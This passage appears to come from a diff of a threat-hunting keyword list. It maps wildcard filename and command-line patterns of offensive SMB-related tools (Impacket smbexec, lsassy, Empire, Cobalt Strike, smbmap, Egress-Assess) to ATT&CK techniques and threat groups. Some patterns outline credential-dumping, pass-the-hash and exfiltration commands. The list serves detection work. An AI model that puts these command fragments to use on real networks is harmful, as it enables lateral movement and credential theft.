security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_pipename_stager*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*smb_rras_erraticgopher.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_shadow.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_shadow.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*smb_stealth.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*smb_win.py*","offensive_tool_keyword","SMBGhost_RCE_PoC","RCE PoC for CVE-2020-0796 SMBGhost","T1210 - T1059 - T1505 - T1021 - T1027","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/chompie1337/SMBGhost_RCE_PoC","1","1","N/A","N/A","10","1264","355","2020-07-02T18:51:47Z","2020-06-02T00:14:47Z" -"*smb1_anonymous_connect_ipc*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*smb1_anonymous_login*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*smb1_anonymous_connect_ipc*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*smb1_anonymous_login*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*-smb2support --remove-mic --shadow-credentials --shadow-target *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*smbattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 
- T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*smbattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*smbattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*smbclient \\\\\\\\*\\\\TRANSFER -N -p * -c \*put *","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*smbcrawler*","offensive_tool_keyword","smbcrawler","SmbCrawler is a tool that takes credentials and a list of hosts and crawls through those shares","T1077 - T1021 - T1110 - T1083","TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement - Collection","https://github.com/SySS-Research/smbcrawler","1","1","N/A","N/A","2","129","13","2023-05-14T06:48:40Z","2021-06-09T19:27:08Z" -"*SMBeagle.exe*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" -"*SMBeagle.sln*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" -"*smbeagle_*_linux_amd64.zip*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" -"*smbeagle_*_linux_arm64.zip*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" -"*smbeagle_*_win_x64.zip*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*SMBeagle.exe*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*SMBeagle.sln*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*smbeagle_*_linux_amd64.zip*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*smbeagle_*_linux_arm64.zip*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*smbeagle_*_win_x64.zip*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*smbenum.run*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*SMBetray*","offensive_tool_keyword","SMBetray","PoC to demonstrate the ability of an attacker to intercept and modify insecure SMB connections. 
as well as compromise some secured SMB connections if credentials are known.","T1557 - T1562 - T1553 - T1213","TA0002 - TA0008 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/quickbreach/SMBetray","1","1","N/A","N/A","4","382","97","2018-08-17T00:45:05Z","2018-08-12T00:38:02Z" -"*-SMBExec*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*-SMBExec*","offensive_tool_keyword","empire","Empire scripts functions. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*smbexec.py -hashes :*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*smbexec.py 
-share*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*smbexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*smbexec.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*SMBGhost.pcap*","offensive_tool_keyword","SMBGhost","Simple scanner for CVE-2020-0796 - SMBv3 RCE.","T1210 - T1573 - T1553 - T1216 - T1027","TA0006 - TA0011 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ollypwn/SMBGhost","1","1","N/A","N/A","7","647","206","2020-10-01T08:36:29Z","2020-03-11T15:21:27Z" -"*smbmap -*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*smbmap -*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. 
and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" "*smbmap -u guest -H *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*smbmap.py *","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" -"*smbmap.smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. 
